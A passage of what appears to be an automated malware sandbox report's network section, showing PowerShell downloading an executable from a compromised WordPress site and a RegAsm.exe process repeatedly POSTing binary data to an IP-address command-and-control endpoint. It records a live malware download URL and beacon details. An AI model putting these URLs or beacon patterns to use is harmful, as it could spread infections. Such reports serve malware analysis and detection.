                                                                                        Jan 5, 2021 19:05:22.378812075 CET192.168.2.228.8.8.80x1175Standard query (0)bighoreca.nlA (IP address)IN (0x0001)

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:22.447736979 CET8.8.8.8192.168.2.220x1175No error (0)bighoreca.nl83.172.144.37A (IP address)IN (0x0001)

                                                                                        HTTP Request Dependency Graph

                                                                                        • bighoreca.nl
                                                                                        • 185.206.215.56

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.224916783.172.144.3780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:05:22.500040054 CET70OUTGET /wp-content/themes/index/QPR-3067.exe HTTP/1.1
                                                                                        Host: bighoreca.nl
                                                                                        Connection: Keep-Alive
                                                                                        Jan 5, 2021 19:05:22.551645994 CET71INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 05 Jan 2021 18:05:22 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 938440
                                                                                        Last-Modified: Tue, 05 Jan 2021 14:03:47 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "5ff471c3-e51c8"
                                                                                        X-Powered-By: PleskLin
                                                                                        Accept-Ranges: bytes


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.2249168185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:07.649980068 CET1143OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 176
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:07.837934971 CET1143INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:06 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        10192.168.2.2249177185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:11.296993017 CET1155OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:11.461579084 CET1155INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        100192.168.2.2249267185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        101192.168.2.2249268185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        102192.168.2.2249269185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        103192.168.2.2249270185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        104192.168.2.2249271185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        105192.168.2.2249272185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        106192.168.2.2249273185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        107192.168.2.2249274185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        108192.168.2.2249275185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        109192.168.2.2249276185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        11192.168.2.2249178185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:11.686949968 CET1156OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:11.871412992 CET1157INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        110192.168.2.2249277185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        111192.168.2.2249278185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        112192.168.2.2249279185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        113192.168.2.2249280185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        114192.168.2.2249281185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        115192.168.2.2249282185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        116192.168.2.2249283185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        117192.168.2.2249284185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        118192.168.2.2249285185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        119192.168.2.2249286185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        12192.168.2.2249179185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.075634003 CET1157OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.243051052 CET1158INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        120192.168.2.2249287185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        121192.168.2.2249288185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        122192.168.2.2249289185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        123192.168.2.2249290185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        124192.168.2.2249291185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        125192.168.2.2249292185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        126192.168.2.2249293185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        127192.168.2.2249294185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        128192.168.2.2249295185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        129192.168.2.2249296185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        13192.168.2.2249180185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.449877024 CET1159OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.609106064 CET1159INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:11 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        130192.168.2.2249297185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        131192.168.2.2249298185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        132192.168.2.2249299185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        133192.168.2.2249300185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        134192.168.2.2249301185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        135192.168.2.2249302185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        136192.168.2.2249303185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        137192.168.2.2249304185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        138192.168.2.2249305185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        139192.168.2.2249306185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        14192.168.2.2249181185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:12.832798958 CET1160OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:12.987730980 CET1161INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        140192.168.2.2249307185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        141192.168.2.2249308185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        142192.168.2.2249309185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        143192.168.2.2249310185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        144192.168.2.2249311185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        145192.168.2.2249312185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        146192.168.2.2249313185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        147192.168.2.2249314185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        148192.168.2.2249315185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        149192.168.2.2249316185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        15192.168.2.2249182185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:13.213063955 CET1161OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:13.388159037 CET1162INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        150192.168.2.2249317185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        151192.168.2.2249318185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        152192.168.2.2249319185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        153192.168.2.2249320185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        154192.168.2.2249321185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        155192.168.2.2249322185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        156192.168.2.2249323185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        157192.168.2.2249324185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        158192.168.2.2249325185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        159192.168.2.2249326185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        16192.168.2.2249183185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:13.606386900 CET1163OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:13.778989077 CET1163INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:12 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        160192.168.2.2249327185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        161192.168.2.2249328185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        162192.168.2.2249329185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        163192.168.2.2249330185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        164192.168.2.2249331185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        165192.168.2.2249332185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        166192.168.2.2249333185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        167192.168.2.2249334185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        168192.168.2.2249335185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        169192.168.2.2249336185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        17192.168.2.2249184185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.002546072 CET1164OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.168911934 CET1164INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        170192.168.2.2249337185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        171192.168.2.2249338185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        172192.168.2.2249339185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        173192.168.2.2249340185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        174192.168.2.2249341185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        175192.168.2.2249342185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        176192.168.2.2249343185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        177192.168.2.2249344185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        178192.168.2.2249345185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
